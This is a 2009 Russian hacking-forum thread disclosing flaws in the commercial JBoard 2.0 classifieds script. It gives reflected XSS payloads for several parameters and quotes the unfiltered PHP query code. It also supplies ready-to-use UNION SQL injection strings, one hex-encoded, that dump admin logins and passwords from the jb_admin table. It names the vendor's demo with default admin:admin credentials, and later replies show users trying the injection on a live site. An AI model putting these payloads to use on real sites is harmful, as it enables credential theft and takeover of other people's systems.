Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   JBoard Ver.2.0 Коммерческая версия (https://forum.antichat.xyz/showthread.php?t=104470)

BlackSun 03.02.2009 09:18
JBoard Ver.2.0 Коммерческая версия
 
JBoard Ver.2.0 Коммерческая версия
Офф сайт: http://allpublication.ru/
Demo: http://allpublication.ru/board/demo/
admin;admin
Версия: 2.0

Пассивная XSS
editform.php?notice=<script>alert()</script>
*?user_title=</title><script>alert()</script>
* любые страницы, т.к. уязвимость в inc/head.inc.php
core/edit_user_message.php?edit_user_message="><script> alert()</script><noscript>

SQL-INJ
Присутствует на странице sboard.php
sboard.php :
PHP код:
elseif (!@$_GET['id_mess'] && !@$_GET['id_cat'] && (@$_GET['op'] == "all_cat" || @$_GET['city'])) require_once("core/all_cat.php"); 
all_cat.php
PHP код:
if ($c['print_top'] == "yes") require_once("inc/top_add.inc.php"); 
top_add.inc.php
Идет запрос в БД с параметром $_GET['city'], который нигде не фильтруется
PHP код:
if (@$_GET['city'])
{
    $from_city_query mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = '".$_GET['city']."' LIMIT 1"); 
    if (mysql_num_rows ($from_city_query) == 1)
    {
        $from_city mysql_fetch_assoc ($from_city_query);
        $city_from_search " AND city = '".$from_city['city_name']."' "
Результат используется во втором запросе
PHP код:
$top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = 'old' ".@$city_from_search." ORDER by hits DESC LIMIT $limit"); 
if (mysql_num_rows($top_add))
{
?>

<H4><?=$lang[610]?></H4>
<table border="0" class="GRayBox" cellpadding="0" cellspacing="0">
  <tr class="top">
    <td class="img1">&nbsp;</td>
    <td class="img2">&nbsp;</td>
    <td class="img3">&nbsp;</td>
  </tr>
  <tr>
    <td class="imgL">&nbsp;</td>
    <td class="t"><a href="#">
      <?
    while ($top mysql_fetch_assoc ($top_add))
    {
        $tip str_replace("\r\n"," "htmlspecialchars($top['text']));
        echo "<a href=\"".$h."/advertisement/nesting/".$top['id_category']."/kind/".$top['board_id']."/\" onmouseover=\"Tip('".$tip."')\"><strong>".$top['title']."</strong></a>";
Ядовитый запрос для первого запроса (прям тафталогия):
a' UNION SELECT 1 --
Для второго запроса:
a' UNION SELECT 1,2,3,4,5,6,concat_ws(0x3,login,password),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
Переведем в число(*16):
0x612720554e494f4e2053454c45435420312c322c332c342c 352c362c636f6e6361745f7773283078332c6c6f67696e2c70 617373776f7264292c382c392c31302c31312c31322c31332c 31342c31352c31362c31372c31382c31392c32302c32312c32 322c32332c32342c32352c32362c32372c32382c32392c3330 2c33312c33322c33332c33342046524f4d206a625f61646d69 6e202d2d20

В итоге получаем следующий запрос:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20

SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)

[x26]VOLAND 03.02.2009 12:49
Мда, и этот быдлокод ещё коммерческий... Кошмар.

demon201984 28.04.2009 18:14
SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)[/QUOTE]

Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет.

Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --

Я что-то неверно ввожу или автор этот баг уже исправил?

BlackSun 16.05.2009 23:10
Цитата:
Сообщение от demon201984
Цитата:
SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)
Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет.

Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --

Я что-то неверно ввожу или автор этот баг уже исправил?
Читать умеешь? POST запрос

PS: переменная id_category

fl00der 16.05.2009 23:38
Блин, ну вот как вы это нашли, я понять просто не в силах...
Особенно вот это:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20

bluesky 13.10.2009 07:12
Читать умеешь? POST запрос
PS: переменная id_category[/QUOTE]
Так подскажите как и чем можно реализовать сори за тупость, просто надо :confused:

Ctacok 13.10.2009 07:17
Цитата:
Сообщение от fl00der
Блин, ну вот как вы это нашли, я понять просто не в силах...
Особенно вот это:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20
https://forum.antichat.ru/thread43966.html


Время: 16:28